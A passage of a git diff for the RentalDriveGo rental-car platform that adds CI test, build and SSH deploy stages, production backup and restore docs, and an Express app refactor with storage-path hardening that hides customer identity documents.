diff --git a/.gitlab-ci.yml b/.gitlab-ci.yml index e735082..abfe01a 100644 --- a/.gitlab-ci.yml +++ b/.gitlab-ci.yml @@ -1,28 +1,141 @@ stages: + - test - build - deploy variables: DOCKER_IMAGE: $CI_REGISTRY_IMAGE:$CI_COMMIT_SHORT_SHA + DOCKER_IMAGE_LATEST: $CI_REGISTRY_IMAGE:latest + DOCKERFILE_PATH: Dockerfile.production + # Required: disable TLS so the docker client can reach the dind daemon + DOCKER_TLS_CERTDIR: "" -build: +# ==================================== +# TEST STAGE +# Runs on every push and merge request +# ==================================== +unit_tests: + stage: test + image: node:20-bookworm + before_script: + - npm ci + - npm run db:generate + script: + - npm run type-check + - npm run test:api + rules: + - if: $CI_PIPELINE_SOURCE == "merge_request_event" + - if: $CI_COMMIT_BRANCH == "main" + +integration_tests: + stage: test + image: node:20-bookworm + services: + - name: postgres:16-alpine + alias: postgres + variables: + POSTGRES_DB: rentaldrivego_test + POSTGRES_USER: postgres + POSTGRES_PASSWORD: password + - name: redis:7-alpine + alias: redis + variables: + # Used by db:deploy (Prisma migrations) and any code reading DATABASE_URL directly + DATABASE_URL: "postgresql://postgres:password@postgres:5432/rentaldrivego_test" + REDIS_URL: "redis://redis:6379" + NODE_ENV: test + before_script: + - npm ci + - npm run db:generate + # Overwrite the local .env.test so vitest integration config gets CI service hostnames + # (the file uses postgres/redis aliases, not localhost) + - | + cat > apps/api/.env.test << 'EOF' + DATABASE_URL=postgresql://postgres:password@postgres:5432/rentaldrivego_test + REDIS_URL=redis://redis:6379 + JWT_SECRET=test-secret + JWT_EXPIRY=8h + NODE_ENV=test + FILE_STORAGE_ROOT=/tmp/rentaldrivego-test-storage + EOF + - npm run db:deploy + script: + - npm run test:api:integration + rules: + - if: $CI_PIPELINE_SOURCE == "merge_request_event" + - if: $CI_COMMIT_BRANCH == "main" + +# ==================================== +# BUILD STAGE +# ==================================== +build_image: stage: build image: docker:24 services: - - docker:dind - script: + - name: docker:24-dind + alias: docker + before_script: - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY - - docker build -t $DOCKER_IMAGE . + script: + - echo "--- Building Docker Image ---" + # NEXT_PUBLIC_* vars are inlined into Next.js bundles at build time — must be passed as ARGs + - | + docker build \ + --build-arg NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL \ + --build-arg NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL \ + --build-arg NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL \ + --build-arg NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL \ + -t $DOCKER_IMAGE \ + -t $DOCKER_IMAGE_LATEST \ + -f $DOCKERFILE_PATH . + - echo "--- Pushing to Registry ---" - docker push $DOCKER_IMAGE - only: - - main + - docker push $DOCKER_IMAGE_LATEST + rules: + - if: $CI_COMMIT_BRANCH == "main" -deploy: +# ==================================== +# DEPLOY STAGE +# ==================================== +deploy_to_vps: stage: deploy + image: alpine:latest + needs: + - build_image before_script: - apk add --no-cache openssh-client + # Load the SSH private key stored in the CI variable SSH_PRIVATE_KEY + - eval $(ssh-agent -s) + - echo "$SSH_PRIVATE_KEY" | tr -d '\r' | ssh-add - + - mkdir -p ~/.ssh && chmod 700 ~/.ssh + # Scan and trust the VPS host key (avoids manual known_hosts management) + - ssh-keyscan -H $VPS_IP >> ~/.ssh/known_hosts + - chmod 644 ~/.ssh/known_hosts script: - - ssh $VPS_USER@$VPS_IP "docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY" - - ssh $VPS_USER@$VPS_IP "docker pull $DOCKER_IMAGE" - - ssh $VPS_USER@$VPS_IP "docker stop myapp || true" - - ssh $VPS_USER@$VPS_IP "docker run -d --name myapp -p 80:3000 $DOCKER_IMAGE" \ No newline at end of file + - echo "--- Deploying $DOCKER_IMAGE to VPS ---" + - | + ssh $VPS_USER@$VPS_IP " + set -e + cd /opt/rentaldrivego + + echo '-- Pulling latest code --' + git pull + + echo '-- Logging into registry --' + docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY + + echo '-- Pulling pre-built image --' + docker pull $DOCKER_IMAGE + + echo '-- Restarting services --' + APP_VERSION=$CI_COMMIT_SHORT_SHA \ + docker compose -p rentaldrivego-prod \ + --env-file .env.docker.production \ + -f docker-compose.production.yml \ + up -d --no-build + + echo '-- Pruning old images --' + docker image prune -f + " + rules: + - if: $CI_COMMIT_BRANCH == "main" diff --git a/.jmo/history.db b/.jmo/history.db new file mode 100644 index 0000000..6f117be Binary files /dev/null and b/.jmo/history.db differ diff --git a/DOCKER.md b/DOCKER.md index 3dff448..ae3c0df 100644 --- a/DOCKER.md +++ b/DOCKER.md @@ -103,6 +103,7 @@ The test container runs: - `npm run db:generate` - `npm run type-check` - `npm run build` +- `npm run test:api:integration` ### Production @@ -240,6 +241,70 @@ npm run docker:prod:logs npm run docker:prod:logs:api ``` +#### Backup production data + +Create a timestamped backup directory under `./backups`: + +```bash +npm run docker:prod:backup +``` + +Or choose a different parent directory: + +```bash +bash scripts/docker-prod-backup.sh /srv/rentaldrivego-backups +``` + +Each backup contains: + +- `postgres.dump` — logical PostgreSQL backup in custom format +- `api-uploads.tar.gz` — uploaded files from `/var/lib/rentaldrivego/storage` +- `traefik-letsencrypt.tar.gz` — Traefik ACME certificate state, when available +- `volumes/*.tar.gz` — raw Docker volume archives for the default production volumes +- `manifest.txt` — basic metadata + +By default, the backup also archives these named production volumes when they exist: + +- `${DOCKER_PROD_PROJECT_NAME:-rentaldrivego-prod}_api_uploads` +- `${DOCKER_PROD_PROJECT_NAME:-rentaldrivego-prod}_pgmanage_prod_data` +- `${DOCKER_PROD_PROJECT_NAME:-rentaldrivego-prod}_postgres_prod_data` +- `${DOCKER_PROD_PROJECT_NAME:-rentaldrivego-prod}_redis_prod_data` + +To include extra named volumes from the same server, pass them as additional arguments: + +```bash +bash scripts/docker-prod-backup.sh /srv/rentaldrivego-backups \ + gitlab-l3gq_gitlab-config \ + gitlab-l3gq_gitlab-data \ + gitlab-l3gq_gitlab-logs \ + pgmanage_data \ + traefik-gcjk_portainer_data \ + traefik-gcjk_traefik-letsencrypt +``` + +You can also provide extra volume names through `DOCKER_EXTRA_BACKUP_VOLUMES`. + +#### Restore production data + +Restore is destructive: it overwrites the production database, uploaded files, and, when present in the backup, Traefik ACME state. + +```bash +bash scripts/docker-prod-restore.sh ./backups/rentaldrivego-prod-YYYYMMDDTHHMMSSZ --yes +``` + +The restore script: + +1. Stops public app services +2. Restores the PostgreSQL dump +3. Replaces uploaded files +4. Restores Traefik ACME state if the archive exists +5. Restores raw volume archives from `volumes/` except the ones already covered by the database and upload restore steps +6. Starts Traefik and the production stack again + +If the backup contains raw archives for volumes used by other stacks such as GitLab or Portainer, stop those containers before running restore. The script will refuse to overwrite a volume that is currently attached to a running container. + +Before running restore on a live server, take a fresh backup first. + #### Stop the stack ```bash diff --git a/Dockerfile.test b/Dockerfile.test index 2b313a6..da7550b 100644 --- a/Dockerfile.test +++ b/Dockerfile.test @@ -12,4 +12,4 @@ RUN npm install ENV NODE_ENV=test -CMD ["sh", "-c", "npm run db:generate && npm run type-check && npm run build"] +CMD ["sh", "-c", "npm run db:deploy && npm run db:generate && npm run type-check && npm run build && npm run test:api:integration"] diff --git a/apps/api/.env.test b/apps/api/.env.test new file mode 100644 index 0000000..538a5e4 --- /dev/null +++ b/apps/api/.env.test @@ -0,0 +1,6 @@ +DATABASE_URL=postgresql://postgres:password@localhost:5432/rentaldrivego_test +REDIS_URL=redis://localhost:6379 +JWT_SECRET=test-secret +JWT_EXPIRY=8h +NODE_ENV=test +FILE_STORAGE_ROOT=/tmp/rentaldrivego-test-storage diff --git a/apps/api/package.json b/apps/api/package.json index 9b6d4fa..9bb4690 100644 --- a/apps/api/package.json +++ b/apps/api/package.json @@ -9,7 +9,11 @@ "build": "tsc", "prestart": "npm run build --workspace @rentaldrivego/types", "start": "node dist/index.js", - "type-check": "tsc --noEmit" + "type-check": "tsc --noEmit", + "test": "vitest run", + "test:watch": "vitest", + "test:integration": "vitest run --config vitest.integration.config.ts", + "test:integration:watch": "vitest --config vitest.integration.config.ts" }, "dependencies": { "@react-pdf/renderer": "^3.4.3", @@ -50,7 +54,10 @@ "@types/qrcode": "^1.5.5", "@types/react": "^18.3.1", "@types/react-dom": "^18.3.0", + "@types/supertest": "^6.0.2", + "supertest": "^7.0.0", "ts-node-dev": "^2.0.0", - "typescript": "^5.4.0" + "typescript": "^5.4.0", + "vitest": "^1.6.0" } } diff --git a/apps/api/src/app.ts b/apps/api/src/app.ts new file mode 100644 index 0000000..e68a487 --- /dev/null +++ b/apps/api/src/app.ts @@ -0,0 +1,140 @@ +import express from 'express' +import cors from 'cors' +import helmet from 'helmet' +import morgan from 'morgan' +import { getLegacyStorageRoots, getStorageRoot } from './lib/storage' +import { authLimiter, apiLimiter, publicLimiter, adminLimiter } from './middleware/rateLimiter' + +// ─── Module routes ──────────────────────────────────────────── +import webhookRouter from './modules/webhooks/webhook.routes' +import companyAuthRouter from './modules/auth/auth.company.routes' +import employeeAuthRouter from './modules/auth/auth.employee.routes' +import renterAuthRouter from './modules/auth/auth.renter.routes' +import teamRouter from './modules/team/team.routes' +import offersRouter from './modules/offers/offer.routes' +import analyticsRouter from './modules/analytics/analytics.routes' +import notificationsRouter from './modules/notifications/notification.routes' +import adminRouter from './modules/admin/admin.routes' +import subscriptionsRouter from './modules/subscriptions/subscription.routes' +import paymentsRouter from './modules/payments/payment.routes' +import customersRouter from './modules/customers/customer.routes' +import vehiclesRouter from './modules/vehicles/vehicle.routes' +import companiesRouter from './modules/companies/company.routes' +import reservationsRouter from './modules/reservations/reservation.routes' +import marketplaceRouter from './modules/marketplace/marketplace.routes' +import siteRouter from './modules/site/site.routes' + +// ─── Centralized error handling ─────────────────────────────── +import { errorMiddleware } from './http/errors/errorMiddleware' + +const v1 = '/api/v1' + +const defaultCorsOrigins = [ + 'http://localhost:3000', + 'http://localhost:3001', + 'http://localhost:3002', + 'http://localhost:3003', + 'http://127.0.0.1:3000', + 'http://127.0.0.1:3001', + 'http://127.0.0.1:3002', + 'http://127.0.0.1:3003', +] + +export const corsOrigins = process.env.CORS_ORIGINS + ? process.env.CORS_ORIGINS.split(',').map((o) => o.trim()).filter(Boolean) + : defaultCorsOrigins + +const routeDocs = [ + { method: 'GET', path: '/health', description: 'Health check' }, + { method: 'GET', path: `${v1}/docs`, description: 'Machine-readable API index' }, + { method: 'GET', path: `${v1}/auth/renter/me`, description: 'Current renter profile' }, + { method: 'GET', path: `${v1}/vehicles`, description: 'List company vehicles' }, + { method: 'POST', path: `${v1}/vehicles`, description: 'Create vehicle' }, + { method: 'GET', path: `${v1}/reservations`, description: 'List reservations' }, + { method: 'POST', path: `${v1}/reservations`, description: 'Create reservation' }, + { method: 'GET', path: `${v1}/customers`, description: 'List customers' }, + { method: 'POST', path: `${v1}/customers`, description: 'Create customer' }, + { method: 'GET', path: `${v1}/offers`, description: 'List offers' }, + { method: 'GET', path: `${v1}/analytics/dashboard`, description: 'Dashboard analytics' }, + { method: 'GET', path: `${v1}/analytics/report`, description: 'Analytics report' }, + { method: 'GET', path: `${v1}/notifications/company`, description: 'Company notifications' }, + { method: 'GET', path: `${v1}/marketplace/cities`, description: 'Marketplace cities' }, + { method: 'GET', path: `${v1}/marketplace/search`, description: 'Marketplace search' }, + { method: 'GET', path: `${v1}/site/:slug/brand`, description: 'Public site brand config' }, + { method: 'GET', path: `${v1}/companies/me`, description: 'Current company profile' }, + { method: 'GET', path: `${v1}/subscriptions/plans`, description: 'Subscription plans' }, + { method: 'POST', path: `${v1}/admin/auth/login`, description: 'Admin login' }, +] + +export function createApp() { + const app = express() + const corsMiddleware = cors({ origin: corsOrigins, credentials: true }) + + if (process.env.NODE_ENV === 'production') { + app.set('trust proxy', 1) + } + + app.use(corsMiddleware) + + // Customer identity documents must never be anonymously retrievable from the + // public storage mount, even if an older raw storage URL leaks. + app.use('/storage/companies/:companyId/customers/:customerId', (_req, res) => { + res.status(404).end() + }) + + // Serve uploaded assets from the configured storage root, with a legacy fallback + // for older files that were written under the previous API-local path. + app.use('/storage', express.static(getStorageRoot())) + for (const legacyRoot of getLegacyStorageRoots()) { + app.use('/storage', express.static(legacyRoot)) + } + + // Webhook must use raw body BEFORE express.json() + app.use('/api/v1/webhooks', express.raw({ type: 'application/json' }), webhookRouter) + + app.use(helmet()) + if (process.env.NODE_ENV !== 'test') app.use(morgan('combined')) + app.use(express.json({ limit: '10mb' })) + + // ─── API Routes ───────────────────────────────────────────── + app.use(`${v1}/auth/renter`, authLimiter, renterAuthRouter) + app.use(`${v1}/auth/company`, authLimiter, companyAuthRouter) + app.use(`${v1}/auth/employee`, authLimiter, employeeAuthRouter) + + app.use(`${v1}/admin`, adminLimiter, adminRouter) + + app.use(`${v1}/marketplace`, publicLimiter, marketplaceRouter) + app.use(`${v1}/site`, publicLimiter, siteRouter) + + app.use(`${v1}/vehicles`, apiLimiter, vehiclesRouter) + app.use(`${v1}/reservations`, apiLimiter, reservationsRouter) + app.use(`${v1}/team`, apiLimiter, teamRouter) + app.use(`${v1}/customers`, apiLimiter, customersRouter) + app.use(`${v1}/offers`, apiLimiter, offersRouter) + app.use(`${v1}/analytics`, apiLimiter, analyticsRouter) + app.use(`${v1}/notifications`, apiLimiter, notificationsRouter) + app.use(`${v1}/companies`, apiLimiter, companiesRouter) + app.use(`${v1}/subscriptions`, apiLimiter, subscriptionsRouter) + app.use(`${v1}/payments`, apiLimiter, paymentsRouter) + + // ─── Health / Docs ────────────────────────────────────────── + app.get('/health', (_req, res) => { + res.json({ status: 'ok', version: '1.0.0', timestamp: new Date().toISOString() }) + }) + + app.get(`${v1}/docs`, (_req, res) => { + res.json({ name: 'rentaldrivego-api', version: '1.0.0', baseUrl: v1, docsUrl: '/docs', routes: routeDocs }) + }) + + app.get('/docs', (_req, res) => { + const rows = routeDocs + .map((r) => `${r.method}${r.path}${r.description}`) + .join('') + res.type('html').send(`RentalDriveGo API Docs

RentalDriveGo API

${rows}
MethodPathDescription
`) + }) + + // ─── Error handler ────────────────────────────────────────── + app.use(errorMiddleware) + + return app +} diff --git a/apps/api/src/http/errors/errorMiddleware.ts b/apps/api/src/http/errors/errorMiddleware.ts new file mode 100644 index 0000000..e6b9247 --- /dev/null +++ b/apps/api/src/http/errors/errorMiddleware.ts @@ -0,0 +1,29 @@ +import { Request, Response, NextFunction } from 'express' +import { AppError } from './index' + +export function errorMiddleware(err: any, _req: Request, res: Response, _next: NextFunction) { + if (err.name === 'ZodError') { + return res.status(400).json({ error: 'validation_error', message: 'Invalid request body', issues: err.issues, statusCode: 400 }) + } + + if (err.code === 'P2025') { + return res.status(404).json({ error: 'not_found', message: 'Resource not found', statusCode: 404 }) + } + + if (err.code === 'P2002') { + return res.status(409).json({ error: 'conflict', message: 'A resource with this value already exists', statusCode: 409 }) + } + + if (err instanceof AppError) { + if (err.statusCode >= 500) console.error('[API Error]', err) + return res.status(err.statusCode).json({ error: err.error, message: err.message, statusCode: err.statusCode, ...err.data }) + } + + const statusCode = err.statusCode ?? 500 + const message = err.message ?? 'Internal server error' + const code = err.code ?? 'internal_error' + + if (statusCode >= 500) console.error('[API Error]', err) + + res.status(statusCode).json({ error: code, message, statusCode }) +} diff --git a/apps/api/src/http/errors/index.ts b/apps/api/src/http/errors/index.ts new file mode 100644 index 0000000..8cf4f8b --- /dev/null +++ b/apps/api/src/http/errors/index.ts @@ -0,0 +1,43 @@ +export class AppError extends Error { + readonly statusCode: number + readonly error: string + readonly data?: Record + + constructor(message: string, statusCode: number, error: string, data?: Record) { + super(message) + this.statusCode = statusCode + this.error = error + this.data = data + this.name = this.constructor.name + } +} + +export class ValidationError extends AppError { + constructor(message = 'Validation error') { + super(message, 400, 'validation_error') + } +} + +export class NotFoundError extends AppError { + constructor(message = 'Resource not found') { + super(message, 404, 'not_found') + } +} + +export class ConflictError extends AppError { + constructor(message = 'A resource with this value already exists') { + super(message, 409, 'conflict') + } +} + +export class ForbiddenError extends AppError { + constructor(message = 'Forbidden') { + super(message, 403, 'forbidden') + } +} + +export class UnauthorizedError extends AppError { + constructor(message = 'Unauthorized') { + super(message, 401, 'unauthorized') + } +} diff --git a/apps/api/src/http/respond/index.ts b/apps/api/src/http/respond/index.ts new file mode 100644 index 0000000..bd2b277 --- /dev/null +++ b/apps/api/src/http/respond/index.ts @@ -0,0 +1,13 @@ +import { Response } from 'express' + +export function ok(res: Response, data: T): void { + res.json({ data }) +} + +export function created(res: Response, data: T): void { + res.status(201).json({ data }) +} + +export function noContent(res: Response): void { + res.status(204).end() +} diff --git a/apps/api/src/http/upload/index.ts b/apps/api/src/http/upload/index.ts new file mode 100644 index 0000000..65bfc03 --- /dev/null +++ b/apps/api/src/http/upload/index.ts @@ -0,0 +1,34 @@ +import multer from 'multer' +import { ValidationError } from '../errors' + +const MAX_FILE_SIZE = 10 * 1024 * 1024 // 10 MB + +/** + * Shared multer instance used by all upload endpoints. + * Files are kept in memory so services receive a Buffer — no temp-file cleanup needed. + */ +export const imageUpload = multer({ + storage: multer.memoryStorage(), + limits: { fileSize: MAX_FILE_SIZE }, +}) + +/** + * Asserts that a file was provided and is an image MIME type. + * Call inside the route handler after the multer middleware runs. + */ +export function assertImageFile( + file: Express.Multer.File | undefined, + fieldLabel = 'file', +): asserts file is Express.Multer.File { + if (!file) throw new ValidationError(`A ${fieldLabel} is required`) + if (!file.mimetype.startsWith('image/')) throw new ValidationError('Only image uploads are supported') +} + +/** + * Asserts that at least one file was provided and all files are images. + */ +export function assertImageFiles(files: Express.Multer.File[], fieldLabel = 'photos'): void { + if (!files || files.length === 0) throw new ValidationError(`At least one ${fieldLabel} file is required`) + const nonImage = files.find((f) => !f.mimetype.startsWith('image/')) + if (nonImage) throw new ValidationError(`All uploaded files must be images — "${nonImage.originalname}" is not`) +} diff --git a/apps/api/src/http/validate/index.ts b/apps/api/src/http/validate/index.ts new file mode 100644 index 0000000..a23e224 --- /dev/null +++ b/apps/api/src/http/validate/index.ts @@ -0,0 +1,14 @@ +import type { Request } from 'express' +import type { ZodTypeAny, output } from 'zod' + +export function parseBody(schema: TSchema, req: Request): output { + return schema.parse(req.body) +} + +export function parseQuery(schema: TSchema, req: Request): output { + return schema.parse(req.query) +} + +export function parseParams(schema: TSchema, req: Request): output { + return schema.parse(req.params) +} diff --git a/apps/api/src/index.ts b/apps/api/src/index.ts index 3b6cb92..6506e16 100644 --- a/apps/api/src/index.ts +++ b/apps/api/src/index.ts @@ -1,7 +1,3 @@ -import express from 'express' -import cors from 'cors' -import helmet from 'helmet' -import morgan from 'morgan' import http from 'http' import { Server as SocketIOServer } from 'socket.io' import cron from 'node-cron' @@ -9,72 +5,12 @@ import jwt from 'jsonwebtoken' import { z } from 'zod' import { redis } from './lib/redis' import { prisma } from './lib/prisma' -import { getStorageRoot } from './lib/storage' -import { authLimiter, apiLimiter, publicLimiter, adminLimiter } from './middleware/rateLimiter' +import { assertStorageConfiguration } from './lib/storage' +import { createApp, corsOrigins } from './app' -// ─── Routes ─────────────────────────────────────────────────── -import webhookRouter from './routes/webhooks' -import companyAuthRouter from './routes/auth.company' -import employeeAuthRouter from './routes/auth.employee' -import renterAuthRouter from './routes/auth.renter' -import vehiclesRouter from './routes/vehicles' -import reservationsRouter from './routes/reservations' -import teamRouter from './routes/team' -import customersRouter from './routes/customers' -import offersRouter from './routes/offers' -import analyticsRouter from './routes/analytics' -import notificationsRouter from './routes/notifications' -import marketplaceRouter from './routes/marketplace' -import adminRouter from './routes/admin' -import companiesRouter from './routes/companies' -import subscriptionsRouter from './routes/subscriptions' -import siteRouter from './routes/site' -import paymentsRouter from './routes/payments' - -const app = express() +const app = createApp() const server = http.createServer(app) - -// Trust the first hop from a reverse proxy so req.ip and rate-limiting -// use the real client IP (from X-Forwarded-For) rather than the proxy's IP. -if (process.env.NODE_ENV === 'production') { - app.set('trust proxy', 1) -} -const v1 = '/api/v1' -const defaultCorsOrigins = [ - 'http://localhost:3000', - 'http://localhost:3001', - 'http://localhost:3002', - 'http://localhost:3003', - 'http://127.0.0.1:3000', - 'http://127.0.0.1:3001', - 'http://127.0.0.1:3002', - 'http://127.0.0.1:3003', -] -const corsOrigins = process.env.CORS_ORIGINS - ? process.env.CORS_ORIGINS.split(',').map((origin) => origin.trim()).filter(Boolean) - : defaultCorsOrigins - -const routeDocs = [ - { method: 'GET', path: '/health', description: 'Health check' }, - { method: 'GET', path: `${v1}/docs`, description: 'Machine-readable API index' }, - { method: 'GET', path: `${v1}/auth/renter/me`, description: 'Current renter profile' }, - { method: 'GET', path: `${v1}/vehicles`, description: 'List company vehicles' }, - { method: 'POST', path: `${v1}/vehicles`, description: 'Create vehicle' }, - { method: 'GET', path: `${v1}/reservations`, description: 'List reservations' }, - { method: 'POST', path: `${v1}/reservations`, description: 'Create reservation' }, - { method: 'GET', path: `${v1}/customers`, description: 'List customers' }, - { method: 'POST', path: `${v1}/customers`, description: 'Create customer' }, - { method: 'GET', path: `${v1}/offers`, description: 'List offers' }, - { method: 'GET', path: `${v1}/analytics/dashboard`, description: 'Dashboard analytics' }, - { method: 'GET', path: `${v1}/analytics/report`, description: 'Analytics report' }, - { method: 'GET', path: `${v1}/notifications/company`, description: 'Company notifications' }, - { method: 'GET', path: `${v1}/marketplace/cities`, description: 'Marketplace cities' }, - { method: 'GET', path: `${v1}/marketplace/search`, description: 'Marketplace search' }, - { method: 'GET', path: `${v1}/site/:slug/brand`, description: 'Public site brand config' }, - { method: 'GET', path: `${v1}/companies/me`, description: 'Current company profile' }, - { method: 'GET', path: `${v1}/subscriptions/plans`, description: 'Subscription plans' }, - { method: 'POST', path: `${v1}/admin/auth/login`, description: 'Admin login' }, -] +assertStorageConfiguration() // ─── Socket.io ──────────────────────────────────────────────── const io = new SocketIOServer(server, { @@ -122,132 +58,6 @@ subscriber.on('pmessage', (_pattern, channel, message) => { } }) -// ─── Middleware ──────────────────────────────────────────────── -// Serve uploaded assets from the configured storage root. -app.use('/storage', express.static(getStorageRoot())) - -// Webhook must use raw body BEFORE express.json() -app.use('/api/v1/webhooks', express.raw({ type: 'application/json' }), webhookRouter) - -app.use(helmet()) -app.use(cors({ origin: corsOrigins, credentials: true })) -app.use(morgan('combined')) -app.use(express.json({ limit: '10mb' })) - -// ─── API Routes ─────────────────────────────────────────────── -// Auth routes: strict brute-force protection -app.use(`${v1}/auth/renter`, authLimiter, renterAuthRouter) -app.use(`${v1}/auth/company`, authLimiter, companyAuthRouter) -app.use(`${v1}/auth/employee`, authLimiter, employeeAuthRouter) - -// Admin routes: dedicated limit -app.use(`${v1}/admin`, adminLimiter, adminRouter) - -// Public unauthenticated routes -app.use(`${v1}/marketplace`, publicLimiter, marketplaceRouter) -app.use(`${v1}/site`, publicLimiter, siteRouter) - -// Authenticated company/renter routes -app.use(`${v1}/vehicles`, apiLimiter, vehiclesRouter) -app.use(`${v1}/reservations`, apiLimiter, reservationsRouter) -app.use(`${v1}/team`, apiLimiter, teamRouter) -app.use(`${v1}/customers`, apiLimiter, customersRouter) -app.use(`${v1}/offers`, apiLimiter, offersRouter) -app.use(`${v1}/analytics`, apiLimiter, analyticsRouter) -app.use(`${v1}/notifications`, apiLimiter, notificationsRouter) -app.use(`${v1}/companies`, apiLimiter, companiesRouter) -app.use(`${v1}/subscriptions`, apiLimiter, subscriptionsRouter) -app.use(`${v1}/payments`, apiLimiter, paymentsRouter) - -// ─── Health check ───────────────────────────────────────────── -app.get('/health', (_req, res) => { - res.json({ status: 'ok', version: '1.0.0', timestamp: new Date().toISOString() }) -}) - -app.get(`${v1}/docs`, (_req, res) => { - res.json({ - name: 'rentaldrivego-api', - version: '1.0.0', - baseUrl: v1, - docsUrl: '/docs', - routes: routeDocs, - }) -}) - -app.get('/docs', (_req, res) => { - const rows = routeDocs - .map( - (route) => ` - - ${route.method} - ${route.path} - ${route.description} - `, - ) - .join('') - - res.type('html').send(` - - - - - RentalDriveGo API Docs - - - -

RentalDriveGo API

-

Base URL: ${v1} · JSON index: ${v1}/docs

- - - - - - - - - ${rows} -
MethodPathDescription
- -`) -}) - -// ─── Error handler ──────────────────────────────────────────── -app.use((err: any, _req: express.Request, res: express.Response, _next: express.NextFunction) => { - const statusCode = err.statusCode ?? 500 - const message = err.message ?? 'Internal server error' - const code = err.code ?? 'internal_error' - - if (statusCode >= 500) { - console.error('[API Error]', err) - } - - // Zod validation error - if (err.name === 'ZodError') { - return res.status(400).json({ error: 'validation_error', message: 'Invalid request body', issues: err.issues, statusCode: 400 }) - } - - // Prisma not found - if (err.code === 'P2025') { - return res.status(404).json({ error: 'not_found', message: 'Resource not found', statusCode: 404 }) - } - - // Prisma unique constraint - if (err.code === 'P2002') { - return res.status(409).json({ error: 'conflict', message: 'A resource with this value already exists', statusCode: 409 }) - } - - res.status(statusCode).json({ error: code, message, statusCode }) -}) - // ─── Scheduled jobs ─────────────────────────────────────────── // Daily: flag expiring/expired licenses diff --git a/apps/api/src/lib/isDatabaseUnavailable.ts b/apps/api/src/lib/isDatabaseUnavailable.ts new file mode 100644 index 0000000..1c70913 --- /dev/null +++ b/apps/api/src/lib/isDatabaseUnavailable.ts @@ -0,0 +1,5 @@ +export function isDatabaseUnavailableError(error: unknown): boolean { + if (!error || typeof error !== 'object') return false + const candidate = error as { code?: string; message?: string } + return candidate.code === 'P1001' || candidate.message?.includes("Can't reach database server") === true +} diff --git a/apps/api/src/lib/storage.ts b/apps/api/src/lib/storage.ts index 2630279..0f15d8a 100644 --- a/apps/api/src/lib/storage.ts +++ b/apps/api/src/lib/storage.ts @@ -2,7 +2,13 @@ import fs from 'fs' import path from 'path' import crypto from 'crypto' -const DEFAULT_STORAGE_ROOT = path.resolve(__dirname, '..', '..', 'storage') +const APP_PACKAGE_ROOT = path.resolve(__dirname, '..', '..', '..') +const APP_SOURCE_ROOT = path.join(APP_PACKAGE_ROOT, 'src') +const APP_DIST_ROOT = path.join(APP_PACKAGE_ROOT, 'dist') +const DEFAULT_STORAGE_ROOT = path.join(APP_PACKAGE_ROOT, 'storage') +const LEGACY_STORAGE_ROOTS = [ + path.join(APP_SOURCE_ROOT, 'lib', 'storage'), +] export function getStorageRoot(): string { return process.env.FILE_STORAGE_ROOT @@ -10,8 +16,37 @@ export function getStorageRoot(): string { : DEFAULT_STORAGE_ROOT } -function ensureStorageRoot(): string { +export function getLegacyStorageRoots(): string[] { + return LEGACY_STORAGE_ROOTS +} + +function isWithinPath(targetPath: string, parentPath: string): boolean { + const relative = path.relative(parentPath, targetPath) + return relative === '' || (!relative.startsWith('..') && !path.isAbsolute(relative)) +} + +export function assertStorageConfiguration(): string { const storageRoot = getStorageRoot() + + if (process.env.NODE_ENV === 'production' && !process.env.FILE_STORAGE_ROOT) { + throw new Error('FILE_STORAGE_ROOT must be set in production so uploads are stored on the mounted volume.') + } + + if (process.env.NODE_ENV === 'production') { + const forbiddenRoots = [APP_PACKAGE_ROOT, APP_SOURCE_ROOT, APP_DIST_ROOT] + const invalidRoot = forbiddenRoots.find((root) => isWithinPath(storageRoot, root)) + if (invalidRoot) { + throw new Error( + `FILE_STORAGE_ROOT must point outside the API app tree in production. Received ${storageRoot}, which is inside ${invalidRoot}.` + ) + } + } + + return storageRoot +} + +function ensureStorageRoot(): string { + const storageRoot = assertStorageConfiguration() fs.mkdirSync(storageRoot, { recursive: true }) return storageRoot } @@ -20,6 +55,25 @@ function getApiBase(): string { return (process.env.API_URL ?? 'http://localhost:4000').replace(/\/$/, '') } +function getDashboardBase(): string { + return ( + process.env.DASHBOARD_URL ?? + process.env.NEXT_PUBLIC_DASHBOARD_URL ?? + 'http://localhost:3001/dashboard' + ).replace(/\/$/, '') +} + +function getStorageRelativePath(imageUrl: string): string | null { + const marker = '/storage/' + const idx = imageUrl.indexOf(marker) + if (idx === -1) return null + return imageUrl.slice(idx + marker.length) +} + +export function getProtectedCustomerLicenseImageUrl(customerId: string): string { + return `${getDashboardBase()}/api/v1/customers/${customerId}/license-image` +} + export async function uploadImage( buffer: Buffer, folder: string, @@ -38,12 +92,24 @@ export async function uploadImage( return `${getApiBase()}/storage/${folder}/${filename}` } -export async function deleteImage(imageUrl: string): Promise { - const storageRoot = getStorageRoot() - const marker = '/storage/' - const idx = imageUrl.indexOf(marker) - if (idx === -1) return - const relative = imageUrl.slice(idx + marker.length) - const filePath = path.join(storageRoot, relative) - if (fs.existsSync(filePath)) fs.unlinkSync(filePath) +export function resolveStoredFilePath(imageUrl: string): string | null { + const relative = getStorageRelativePath(imageUrl) + if (!relative) return null + + const roots = [assertStorageConfiguration(), ...getLegacyStorageRoots()] + for (const root of roots) { + const filePath = path.join(root, relative) + if (fs.existsSync(filePath)) { + return filePath + } + } + + return null +} + +export async function deleteImage(imageUrl: string): Promise { + const filePath = resolveStoredFilePath(imageUrl) + if (filePath && fs.existsSync(filePath)) { + fs.unlinkSync(filePath) + } } diff --git a/apps/api/src/middleware/authHelpers.ts b/apps/api/src/middleware/authHelpers.ts new file mode 100644 index 0000000..d061944 --- /dev/null +++ b/apps/api/src/middleware/authHelpers.ts @@ -0,0 +1,32 @@ +import { Request, Response } from 'express' + +/** + * Sends a uniform auth-error JSON response. + * All auth middleware must go through this function so the shape is identical + * to what the errorMiddleware produces for AppError instances. + */ +export function sendUnauthorized(res: Response, error: string, message: string) { + return res.status(401).json({ error, message, statusCode: 401 }) +} + +export function getCookie(req: Request, name: string): string | null { + const cookieHeader = req.headers.cookie + if (!cookieHeader) return null + + for 